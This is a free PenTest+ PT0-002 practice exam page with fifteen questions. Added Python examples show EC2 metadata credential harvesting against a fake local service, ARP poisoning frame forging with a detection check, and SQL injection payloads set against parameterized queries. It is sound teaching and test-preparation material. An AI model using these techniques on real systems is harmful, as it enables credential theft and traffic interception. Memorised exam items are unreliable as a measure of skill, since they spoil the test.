
Free CompTIA PenTest+ PT0-002 Practice Test

Prepare for the CompTIA PenTest+ PT0-002 exam with this free practice test. Randomly generated and customizable, this test allows you to choose the number of questions.

  • Questions: 15
  • Time: 15 minutes (60 seconds per question)
  • Included Objectives:
    • Planning and Scoping
    • Information Gathering and Vulnerability Scanning
    • Attacks and Exploits
    • Reporting and Communication
    • Tools and Code Analysis
Question 1 of 15

Tokens issued by a server during a session can be scoped strictly enough to prevent interception and reuse by an unauthorized party.

  • False

  • True

Question 2 of 15

Given that you are conducting an internal penetration test and need to enumerate assets within the organization’s network, which Nmap command or script would you use to produce the most comprehensive list of live hosts, open ports, and services?

  • --top-ports 100

  • -Pn

  • -sV -O --script=all

  • -sn

Question 3 of 15

Which scanner is most effective for testing web applications for potential vulnerabilities such as SQL injection, Cross-Site Scripting (XSS), and file inclusion?

  • Nessus

  • Open vulnerability assessment scanner (OpenVAS)

  • OWASP ZAP

  • Nmap

Question 4 of 15

A penetration tester can capture and analyze all network traffic passing through a switch by simply connecting to any of its ports without additional configurations.

  • False

  • True

Question 5 of 15

In a red team exercise against a company's cloud infrastructure, you discover that the Elastic Compute Cloud (EC2) instances are configured so that any process running on an instance can query the instance metadata service without restriction. With this misconfiguration in mind, which technique should be used to carry out an attack that leverages the instance metadata service to gain escalated privileges within the cloud environment?

  • Engage in Kerberoasting to steal Kerberos tickets from the EC2 instances and gain access to the metadata service.

  • Use NTLM relay attacks to capture authentication details and replay them against the metadata service for escalated cloud privileges.

  • Execute a Direct-to-Origin attack by accessing the instance metadata service directly to retrieve security credentials for IAM role escalation.

  • Perform a VLAN hopping attack to bypass network segmentation and access the metadata service from a compromised instance within the same VLAN.
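The attack path behind Question 5 is two plain HTTP requests from the instance (or from an SSRF that can reach it): list the role under `/latest/meta-data/iam/security-credentials/`, then fetch that role's temporary keys. The following is an added example, not part of the practice test, showing that exchange and why enforcing IMDSv2 breaks it. It talks to a constructed fake metadata server on 127.0.0.1 (the role name and credential values are made up); the URL paths and `X-aws-ec2-metadata-token*` headers are the ones the real service uses.

```python
"""Added example: harvesting IAM role credentials from the EC2 instance metadata
service (IMDS), and the effect of requiring IMDSv2 session tokens.

Runs entirely against a CONSTRUCTED fake IMDS bound to 127.0.0.1. The role name
and credential values below are made up; no AWS endpoint is contacted."""
import json
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

IMDS_PATH = "/latest/meta-data/iam/security-credentials/"
FAKE_ROLE = "web-app-instance-role"          # assumed role name
FAKE_CREDS = {                              # constructed values, not real keys
    "AccessKeyId": "ASIAEXAMPLEFAKE000",
    "SecretAccessKey": "fakeSecretKeyForExampleOnly",
    "Token": "fakeSessionToken",
    "Expiration": "2030-01-01T00:00:00Z",
}
FAKE_V2_TOKEN = "fake-imdsv2-session-token"

# urllib would otherwise honour http_proxy for 127.0.0.1; disable proxies.
_opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))


class FakeIMDS(BaseHTTPRequestHandler):
    require_v2 = False  # True emulates the instance option HttpTokens=required

    def do_PUT(self):
        # IMDSv2 step 1: PUT /latest/api/token with a TTL header returns a token.
        if self.path == "/latest/api/token" and \
                "X-aws-ec2-metadata-token-ttl-seconds" in self.headers:
            self._send(200, FAKE_V2_TOKEN)
        else:
            self._send(400, "")

    def do_GET(self):
        # With IMDSv2 enforced, every GET must carry the session token.
        if self.require_v2 and \
                self.headers.get("X-aws-ec2-metadata-token") != FAKE_V2_TOKEN:
            self._send(401, "")
            return
        if self.path == IMDS_PATH:
            self._send(200, FAKE_ROLE)                 # listing yields the role name
        elif self.path == IMDS_PATH + FAKE_ROLE:
            self._send(200, json.dumps(FAKE_CREDS))    # role document yields the keys
        else:
            self._send(404, "")

    def _send(self, code, body):
        data = body.encode()
        self.send_response(code)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # keep the example quiet
        pass


def start_fake_imds(require_v2):
    """Start a fake IMDS on an ephemeral localhost port; returns its base URL."""
    handler = type("Handler", (FakeIMDS,), {"require_v2": require_v2})
    srv = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return "http://127.0.0.1:%d" % srv.server_port


def _get(url, headers=None):
    req = urllib.request.Request(url, headers=headers or {})
    with _opener.open(req, timeout=5) as resp:
        return resp.read().decode()


def steal_creds_v1(base):
    """IMDSv1 path: two unauthenticated GETs. This is all an SSRF needs."""
    role = _get(base + IMDS_PATH)
    return json.loads(_get(base + IMDS_PATH + role))


def steal_creds_v2(base):
    """IMDSv2 path: PUT for a token, then GETs carrying it. Code on the box can
    still do this, but a GET-only SSRF cannot issue the PUT."""
    req = urllib.request.Request(base + "/latest/api/token", method="PUT",
                                 headers={"X-aws-ec2-metadata-token-ttl-seconds": "21600"})
    with _opener.open(req, timeout=5) as resp:
        token = resp.read().decode()
    hdr = {"X-aws-ec2-metadata-token": token}
    role = _get(base + IMDS_PATH, hdr)
    return json.loads(_get(base + IMDS_PATH + role, hdr))


def v1_path_blocked(base):
    """True when a plain GET to the role listing is rejected with 401."""
    try:
        _get(base + IMDS_PATH)
        return False
    except urllib.error.HTTPError as e:
        return e.code == 401


if __name__ == "__main__":
    lax = start_fake_imds(require_v2=False)
    print("IMDSv1 allowed  -> stolen key:", steal_creds_v1(lax)["AccessKeyId"])
    strict = start_fake_imds(require_v2=True)
    print("IMDSv2 required -> plain GET blocked:", v1_path_blocked(strict))
    print("IMDSv2 flow for code on the instance:", steal_creds_v2(strict)["AccessKeyId"])
```

The fix to recommend in the report is to require tokens (`aws ec2 modify-instance-metadata-options --http-tokens required`) and to set `--http-put-response-hop-limit 1` so the PUT cannot be relayed from a container or a forwarded request; the stolen keys themselves are only as dangerous as the IAM policy attached to the role, which is the other thing to review.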

Question 6 of 15

You have completed a penetration test for a large financial organization and are required to share the final report containing sensitive vulnerability details with multiple stakeholders. Which method should you use to distribute the report securely, as per best practices?

  • Uploading the report to a password-protected public website where stakeholders can download it.

  • Encrypting the report and sending it via an encrypted email service, accessible only to authorized stakeholders with the decryption key.

  • Storing the report on a cloud service without implementing user-specific access controls.

  • Sending the report via standard email with no encryption.

  • Posting direct download links to the report on a private forum frequented by the stakeholders.

  • Distributing physical copies of the report in sealed envelopes via courier services.

Question 7 of 15

During a penetration test, you are tasked with crafting a phishing campaign to test the organization's resilience to social engineering efforts. Using the Social Engineering Toolkit, which of the following would be the BEST approach to emulate a realistic spear-phishing attack?

  • Modify the organization's public website to redirect to your malicious site.

  • Clone a known trusted site and slightly modify it to collect user credentials.

  • Replicate an exact copy of their public website to confuse employees.

  • Send out generic business-related documents that contain no organization-specific information.

Question 8 of 15

Which of the following best describes the purpose of the CVE system?

  • A standardized list of identified cybersecurity vulnerabilities

  • A system for fixing and patching cybersecurity flaws

  • A ranking system for the severity of cybersecurity threats

  • A specific type of cybersecurity vulnerability exploit

Question 9 of 15

During a penetration test, you have been tasked with executing a watering hole attack against a company's employees who routinely visit industry-specific forums and web resources. Before launching the attack, what is the most crucial step to ensure the success of the operation?

  • Cracking the Wi-Fi encryption used by the company's employees

  • Conducting reconnaissance to identify the websites most frequently visited by the target group

  • Monitoring network traffic to capture employee credentials

  • Updating malware signatures to ensure non-detection by antivirus software

Question 10 of 15

During a penetration test, you observe that a network device is continuously broadcasting requests to identify the hardware address corresponding to a known network address. Seeking to intercept and alter the communication between this device and another server within the same broadcast domain, which method would be most suitable for inserting yourself into their communication stream?

  • Deploying an unauthorized DHCP server to reroute traffic through your machine

  • Capturing packets passively to analyze traffic without sending any of your own

  • Introducing forged address resolution protocol responses to bind your hardware address with the server's network address

  • Flooding the network with traffic to prevent legitimate communications from occurring

Question 11 of 15

Which of the following options is the BEST method to identify assets hosted in the cloud as part of an organization's infrastructure during a penetration test?

  • Reviewing job listings from the organization to infer cloud services in use.

  • Utilizing traditional network scanners to scan IP ranges owned by the organization.

  • Employing cloud service discovery tools designed to query cloud provider APIs and enumerate resources.

  • Conducting wardriving around the vicinity of the organization's physical location.

Question 12 of 15

When conducting a penetration test, which of the following best describes a scenario where Ettercap is MOST effective?

  • Creating an encrypted reverse shell to secure the communication channel with a compromised host.

  • ARP poisoning to intercept and modify traffic between two systems on a local network.

  • Exploiting misconfigured server-side request forgery (SSRF) vulnerabilities.

  • Code signing to ensure the integrity and origin of the software to be installed.
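Questions 10 and 12 both turn on the same wire-level trick: an unsolicited ARP reply that binds the attacker's MAC to the server's IP in the victim's cache. The block below is an added example, not part of the practice test or of Ettercap, that builds such a frame byte for byte, parses it back, and runs the arpwatch-style check a defender uses to spot it. All MAC and IP addresses are constructed; the frame is only built and inspected, never sent.

```python
"""Added example: a forged ARP reply (RFC 826, IPv4 over Ethernet) and the
IP-to-MAC change detection that catches it. Addresses are CONSTRUCTED."""
import struct
from dataclasses import dataclass

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))


def ip_bytes(s):
    return bytes(int(x) for x in s.split("."))


def mac_str(b):
    return ":".join("%02x" % x for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def build_arp(opcode, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II header followed by a 28-byte ARP body (42 bytes total)."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETHERTYPE_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, opcode
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, opcode)
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def forge_poison_reply(attacker_mac, server_ip, victim_mac, victim_ip):
    """The move from Question 10: a reply the victim never asked for, claiming
    that server_ip lives at attacker_mac. Sent to the victim's unicast MAC."""
    return build_arp(ARP_REPLY, attacker_mac, server_ip, victim_mac, victim_ip)


@dataclass
class Arp:
    opcode: int
    sender_mac: str
    sender_ip: str
    target_mac: str
    target_ip: str


def parse_arp(frame):
    """Decode an Ethernet+ARP frame; rejects anything that is not IPv4-over-Ethernet ARP."""
    if struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        raise ValueError("not an ARP frame")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported ARP hardware/protocol type")
    p = frame[22:42]
    return Arp(op, mac_str(p[0:6]), ip_str(p[6:10]), mac_str(p[10:16]), ip_str(p[16:20]))


def detect_poisoning(frames):
    """Defender's check: flag any IP whose advertised MAC changes across replies.
    Returns a list of (ip, old_mac, new_mac) tuples."""
    seen, alerts = {}, []
    for f in frames:
        a = parse_arp(f)
        if a.opcode != ARP_REPLY:
            continue
        prev = seen.setdefault(a.sender_ip, a.sender_mac)
        if prev != a.sender_mac:
            alerts.append((a.sender_ip, prev, a.sender_mac))
            seen[a.sender_ip] = a.sender_mac
    return alerts


# Constructed lab addresses for the example.
SERVER_IP, SERVER_MAC = "10.0.0.5", "aa:bb:cc:dd:ee:05"
VICTIM_IP, VICTIM_MAC = "10.0.0.20", "00:11:22:33:44:20"
ATTACKER_MAC = "de:ad:be:ef:00:01"

LEGIT_REPLY = build_arp(ARP_REPLY, SERVER_MAC, SERVER_IP, VICTIM_MAC, VICTIM_IP)
FORGED_REPLY = forge_poison_reply(ATTACKER_MAC, SERVER_IP, VICTIM_MAC, VICTIM_IP)

if __name__ == "__main__":
    print("forged frame:", FORGED_REPLY.hex())
    print("decoded     :", parse_arp(FORGED_REPLY))
    print("alerts      :", detect_poisoning([LEGIT_REPLY, FORGED_REPLY]))
```

Two practical caveats: a transparent interception (what Ettercap's ARP mode does for you) needs the mirror-image reply sent to the server as well, plus IP forwarding on the attacking host so the intercepted flows keep working, and the forged replies must be repeated because cache entries expire and the real host keeps answering. Dynamic ARP inspection on the switch, or a monitor that runs the change check above, is what the report should recommend.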

Question 13 of 15

Which of the following outcomes of manually inspecting web links indicates the highest risk and should be prioritized for further investigation during a penetration testing engagement?

  • Finding several web links that are mislabeled leading to pages with different content than expected.

  • Discovery of server-side scripts that are not executed but can be downloaded through a web link.

  • Uncovering personal data that appears to be used for test purposes in the development version of the site.

  • Discovery of backup files containing source code and database credentials left in a directory accessible through a web link.

Question 14 of 15

During a penetration testing contract, the client has specifically requested an evaluation of existing physical security measures. Your assessment reveals that the current video surveillance system only covers entry and exit points but does not monitor the server room, which houses critical infrastructure. When compiling your findings report, how should this observation be presented to the client?

  • Upgrading the resolution of current cameras to capture clearer imagery

  • Maintaining the current surveillance setup since it adequately covers all necessary areas

  • A recommendation for increasing surveillance to include critical areas such as the server room

  • Reducing the hours of surveillance to conserve resources during business hours

Question 15 of 15

During a penetration test, you have identified that an organization's web application is vulnerable to SQL injection attacks. Which of the following recommendations would be most effective in mitigating this risk?

  • Keep the web server and database server software up to date through regular patch management

  • Sanitize user input and utilize parameterized queries

  • Enforce strong password requirements for all application users

  • Implement multifactor authentication for user logins

  • Encrypt passwords stored within the application database
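The recommendation in Question 15 is easier to justify in a report when the vulnerable query and its fix are shown side by side. The block below is an added example, not part of the practice test: a login lookup written with string concatenation, the same lookup with parameterized placeholders, and an allowlist check for the "sanitize input" half of the answer, all run against an in-memory SQLite table with constructed users.

```python
"""Added example: SQL injection via string concatenation versus a parameterized
query, on a CONSTRUCTED in-memory SQLite users table."""
import re
import sqlite3


def make_db():
    """Constructed sample data; password_hash values are placeholders."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "hash-of-alice-pw", "admin"),
        ("bob", "hash-of-bob-pw", "user"),
    ])
    return db


def login_vulnerable(db, username, password_hash):
    """The finding: user input is pasted into the SQL text, so a quote in the
    username changes the query's grammar instead of being matched as data."""
    sql = ("SELECT username, role FROM users "
           "WHERE username = '%s' AND password_hash = '%s'" % (username, password_hash))
    return db.execute(sql).fetchone()


def login_parameterized(db, username, password_hash):
    """The fix: placeholders. The driver binds the values separately from the
    statement, so quotes, comments and OR clauses in the input stay inert."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password_hash = ?"
    return db.execute(sql, (username, password_hash)).fetchone()


USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def is_valid_username(username):
    """Allowlist validation: defence in depth, not a substitute for binding."""
    return bool(USERNAME_RE.match(username))


if __name__ == "__main__":
    db = make_db()
    # Comment payload: closes the quoted username and comments out the password check.
    payload = "alice' --"
    print("vulnerable   :", login_vulnerable(db, payload, "wrong"))
    print("parameterized:", login_parameterized(db, payload, "wrong"))
    # Tautology payload: returns the first row whatever the credentials.
    taut = "x' OR '1'='1"
    print("vulnerable   :", login_vulnerable(db, taut, taut))
    print("parameterized:", login_parameterized(db, taut, taut))
    print("allowlist rejects payload:", not is_valid_username(payload))
```

Note the order in the answer: parameterization is the control that removes the vulnerability class; validation narrows what reaches the query and gives you a place to log attempts, but on its own it can be bypassed wherever a field legitimately needs quotes. Patching, password policy, MFA and hashing (the distractors) all matter, but none of them changes how the query is built.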